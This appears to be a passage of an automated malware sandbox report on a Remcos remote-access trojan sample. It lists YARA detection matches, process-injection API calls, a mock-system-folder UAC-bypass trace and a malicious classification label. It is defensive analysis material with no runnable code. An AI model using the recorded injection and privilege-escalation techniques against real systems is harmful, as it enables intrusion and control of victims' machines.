                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8730 NtQueueApcThread,0_2_02CA8730
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7A2C NtAllocateVirtualMemory,0_2_02CA7A2C
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,0_2_02CADC8C
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02CADC04
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7D78 NtWriteVirtualMemory,0_2_02CA7D78
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,0_2_02CADD70
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8D6E GetThreadContext,SetThreadContext,NtResumeThread,0_2_02CA8D6E
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8D70 GetThreadContext,SetThreadContext,NtResumeThread,0_2_02CA8D70
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA7A2A NtAllocateVirtualMemory,0_2_02CA7A2A
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CADBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,0_2_02CADBB0
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,7_2_00054823
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,7_2_0005643A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,7_2_00067460
                Source: C:\Users\Public\alpha.pifCode function: 7_2_000564CA NtQueryInformationToken,7_2_000564CA
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00056500 NtQueryInformationToken,NtQueryInformationToken,7_2_00056500
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006A135 NtSetInformationFile,7_2_0006A135
                Source: C:\Users\Public\alpha.pifCode function: 7_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,7_2_0006C1FA
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,7_2_00044E3B
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,7_2_00054759
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054823 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,15_2_00054823
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0005643A NtOpenThreadToken,NtOpenProcessToken,NtClose,15_2_0005643A
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00067460 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,15_2_00067460
                Source: C:\Users\Public\alpha.pifCode function: 15_2_000564CA NtQueryInformationToken,15_2_000564CA
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00056500 NtQueryInformationToken,NtQueryInformationToken,15_2_00056500
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006A135 NtSetInformationFile,15_2_0006A135
                Source: C:\Users\Public\alpha.pifCode function: 15_2_0006C1FA SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,15_2_0006C1FA
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00044E3B _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,15_2_00044E3B
                Source: C:\Users\Public\alpha.pifCode function: 15_2_00054759 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,15_2_00054759
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C58730 NtQueueApcThread,19_2_02C58730
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57A2C NtAllocateVirtualMemory,19_2_02C57A2C
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C5DD70 NtOpenFile,NtReadFile,19_2_02C5DD70
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57D78 NtWriteVirtualMemory,19_2_02C57D78
                Source: C:\Users\Public\Libraries\Wuqtggvo.PIFCode function: 19_2_02C57A2A NtAllocateVirtualMemory,19_2_02C57A2A
                Source: C:\Users\Public\alpha.pifCode function: 7_2_00044C10: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,7_2_00044C10
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02CA8788 CreateProcessAsUserW,0_2_02CA8788
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 11_2_032167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_032167EF
                Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 21_2_02E967EF ExitWindowsEx,LoadLibraryA,GetProcAddress,21_2_02E967EF
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows
                Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64
                Source: C:\Users\Public\alpha.pifFile deleted: C:\Windows \SysWOW64
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02C920C40_2_02C920C4
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3671B0_2_02D3671B
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3E42F0_2_02D3E42F
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4E5FA0_2_02D4E5FA
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3E9BE0_2_02D3E9BE
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D6A93B0_2_02D6A93B
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D64FD90_2_02D64FD9
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D4AF670_2_02D4AF67
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3F0670_2_02D3F067
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D3F1D00_2_02D3F1D0
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D351830_2_02D35183
                Source: C:\Users\user\Desktop\nft438A5fN.exeCode function: 0_2_02D556AC0_2_02D556AC
                Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4280 -s 652
                Source: nft438A5fN.exe | Binary or memory string: OriginalFilename vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A563000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.000000003960E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1592952655.000000003A534000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1477595760.000000007FC9F000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1670762206.000000007FAB0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLOADER.EXEB vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571697841.000000007EAE0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1667611749.000000007EF00000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000003.1571968973.000000007FC20000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTruesight4 vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1613117060.0000000002395000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe, 00000000.00000002.1655641681.0000000039626000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameeasinvoker.exej% vs nft438A5fN.exe
                Source: nft438A5fN.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 33.2.SndVol.exe.3290000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 33.2.SndVol.exe.3290000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 21.2.colorcpl.exe.2e80000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.colorcpl.exe.3200000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 21.2.colorcpl.exe.2e80000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 11.2.colorcpl.exe.3200000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0.2.nft438A5fN.exe.2c90000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 0000000B.00000002.1812796457.0000000003200000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000015.00000002.1812940524.0000000002E80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: 00000000.00000002.1666471917.000000007E810000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                Source: 00000021.00000002.1889410636.0000000003290000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                Source: Process Memory Space: nft438A5fN.exe PID: 520, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 4280, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: colorcpl.exe PID: 432, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: Process Memory Space: SndVol.exe PID: 1376, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                Source: classification engine | Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@39/35@1/2
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0321798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 21_2_02E9798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Code function: 0_2_02C97FD2 GetDiskFreeSpaceA
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0320F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                Source: C:\Users\user\Desktop\nft438A5fN.exe | Code function: 0_2_02CA6DC8 CoCreateInstance
                Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 11_2_0321B539 FindResourceA,LoadResource,LockResource,SizeofResource
